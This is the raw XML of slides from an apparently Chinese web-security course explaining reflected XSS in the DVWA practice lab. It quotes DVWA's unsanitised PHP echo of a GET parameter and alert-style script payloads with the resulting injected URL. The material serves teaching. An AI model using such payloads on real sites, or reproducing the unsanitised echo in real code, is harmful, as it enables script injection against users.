                <a:lnTo>
                  <a:pt x="242120" y="4491"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="288435" y="10028"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="334063" y="17692"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="378953" y="27429"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="423054" y="39190"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="466314" y="52922"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="508682" y="68574"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="550106" y="86095"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="590535" y="105434"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="629917" y="126538"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="668202" y="149357"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="705338" y="173839"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="741273" y="199932"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="775956" y="227586"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="809336" y="256749"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="841361" y="287369"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="871980" y="319395"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="901141" y="352776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="928794" y="387459"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="954886" y="423395"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="979366" y="460531"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1002183" y="498816"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1023286" y="538198"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1042623" y="578627"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1060143" y="620050"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1075794" y="662416"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1089525" y="705675"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1101284" y="749774"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1111021" y="794661"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1118683" y="840287"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1124220" y="886598"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1127580" y="933545"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1128711" y="981075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1128711" y="4114863"/>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2" name="Freeform 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4914900"/>
            <a:ext cx="2038350" cy="1762125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2038350" h="1762125">
                <a:moveTo>
                  <a:pt x="0" y="1762125"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2038350" y="1762125"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2038350" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1762125"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF">
              <a:alpha val="100000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="AutoShape 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1819275" y="61817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4" name="AutoShape 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1819275" y="66770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5" name="AutoShape 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1819275" y="6343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6" name="Freeform 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1819275" y="6515100"/>
            <a:ext cx="66675" cy="57150"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="66675" h="57150">
                <a:moveTo>
                  <a:pt x="33274" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="20359" y="2244"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9779"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AutoShape 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="157162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8" name="AutoShape 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="157162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157162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0" name="Freeform 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="157162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1" name="AutoShape 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="132397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2" name="AutoShape 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="132397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132397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4" name="Freeform 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="132397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5" name="AutoShape 35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10858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6" name="AutoShape 36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10858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7" name="AutoShape 37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10858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8" name="Freeform 38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10858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9" name="AutoShape 39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8763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0" name="AutoShape 40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8763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1" name="AutoShape 41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8763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2" name="Freeform 42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8763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3" name="AutoShape 43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6286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4" name="AutoShape 44"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6286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5" name="AutoShape 45"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6286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6" name="Freeform 46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6286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7" name="AutoShape 47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3810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8" name="AutoShape 48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3810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9" name="AutoShape 49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3810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0" name="Freeform 50"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3810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1" name="AutoShape 51"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142875"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2" name="AutoShape 52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142875"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3" name="AutoShape 53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142875"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4" name="Freeform 54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142875"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5" name="TextBox 55"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3733800" y="3123945"/>
            <a:ext cx="5697855" cy="1029335"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="14002" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="dist">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="110"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <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rPr>
              <a:t>项目目标</a:t>
            </a:r>
            <a:endPar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56" name="Freeform 56"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5715000" y="2581275"/>
            <a:ext cx="762000" cy="85725"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="762000" h="85725">
                <a:moveTo>
                  <a:pt x="719074" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="42799" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26146" y="3367"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12541" y="12557"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3365" y="26199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="42925"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3365" y="59578"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12541" y="73183"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26146" y="82359"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42799" y="85725"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="719074" y="85725"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="735800" y="82359"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="749442" y="73183"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="758632" y="59578"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="762000" y="42925"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="758632" y="26199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="749442" y="12557"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="735800" y="3367"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="719074"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57" name="TextBox 57"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5124195" y="1904999"/>
            <a:ext cx="1943608" cy="575310"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="13335" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="105"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <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rPr>
              <a:t>PART01</a:t>
            </a:r>
            <a:endPar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58" name="AutoShape 58"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9001125" y="257175"/>
            <a:ext cx="2905125" cy="42862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7" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1600200" y="493395"/>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zh-CN" alt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构造XSS脚本</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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4" name="文本框 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1600200" y="1201420"/>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2.常用javascript方法</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pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="2305685"/>
            <a:ext cx="9980295" cy="3473450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4267200" y="1828800"/>
            <a:ext cx="6096000" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>表8-1 常见javascript方法</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>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7" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1600200" y="493395"/>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zh-CN" alt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反射型XSS</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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5" name="文本框 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="400050" y="1541780"/>
            <a:ext cx="5586095" cy="4892675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="13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反射型xss一般出现在URL参数中及网站搜索栏中，由于需要点击包含恶意代码的URL才可以触发，并且只能触发一次，所以也被称为“非持久性xss”。攻击者在URL中插入xss代码，服务端将URL中的xss代码输出到页面上，攻击者将带有xss代码的url发送给用户，用户打开后受到xss攻击。Web应用程序一般都是通过GET/POST方法传递参数的，这里使用了GET方法传递参数，如果我们在Submit里面输入信息a,传递的参数(通过tamperdata获取)如下：GEThttp://www.dvssc.com/dvwa/vulnerabilities/xss_r/?name=a，具体结果如图10-5 所示。</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="文本框 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1600200" y="1143000"/>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1.低安全级别</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pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="图片 5"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="1752600"/>
            <a:ext cx="5915660" cy="4072890"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7848600" y="5943600"/>
            <a:ext cx="6096000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图10-5   XSS源代码图</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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5" name="文本框 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="1676400"/>
            <a:ext cx="10694035" cy="4246245"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>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在DVWA环境下练习，查看网页的后端代码，只要输入的字符不是空字符、NULL，那就直接打印Hello加输入的内容。</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>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&lt;?php</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>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 Is there any input?</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>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if( array_key_exists( "name", $_GET ) &amp;&amp; $_GET[ 'name' ] != NULL ) {</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>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    // Feedback for end user</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>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    echo '&lt;pre&gt;Hello ' . $_GET[ 'name' ] . '&lt;/pre&gt;';</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>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a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>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?&gt;  </a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1600200" y="493395"/>
            <a:ext cx="5483860" cy="878205"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16478" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="130"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" alt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反射型XSS</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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1600200" y="1143000"/>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1.低安全级别</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5" name="文本框 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="1676400"/>
            <a:ext cx="10694035" cy="1938020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>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漏洞分析与利用：代码并没有对XSS 攻击进行任何限制，试着输入“&lt;script &gt;alert('hacker')&lt;/script&gt;”单击“提交”按钮。通过GET方式获取name值，且并未对name值进行处理，导致此处可以进行js脚本注入。</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>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构造js脚本：&lt;script&gt;alert(/反射型xss/)&lt;/script&gt;，执行脚本，其结果如10-6图所示。</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1600200" y="493395"/>
            <a:ext cx="5483860" cy="878205"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16478" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="130"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" alt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反射型XSS</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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1600200" y="1143000"/>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1.低安全级别</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pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="图片 6"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2819400" y="3733800"/>
            <a:ext cx="6313805" cy="2437130"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4191000" y="6248400"/>
            <a:ext cx="6096000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图10-6    执行结果图</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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5" name="文本框 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="593090" y="1541780"/>
            <a:ext cx="4866640" cy="5169535"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>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浏览器上观察执行后的url：dvwa/vulnerabilities/xss_r/?name=&lt;script&gt;alert(%2F反射型xss%2F)&lt;%2Fscript&gt;#，可以看到页面的请求方式就是通过GET请求。标签定义及使用说明：&lt;script&gt; 标签用于定义客户端脚本，比如 JavaScript。&lt;script&gt; 元素既可包含脚本语句，也可以通过 "src" 属性指向外部脚本文件。JavaScript 通常用于图像操作、表单验证以及动态内容更改。测试一下，其结果如图10-7所示。</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1600200" y="493395"/>
            <a:ext cx="5483860" cy="878205"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16478" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="130"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" alt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反射型XSS</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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1600200" y="1143000"/>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1.低安全级别</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pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7"/>
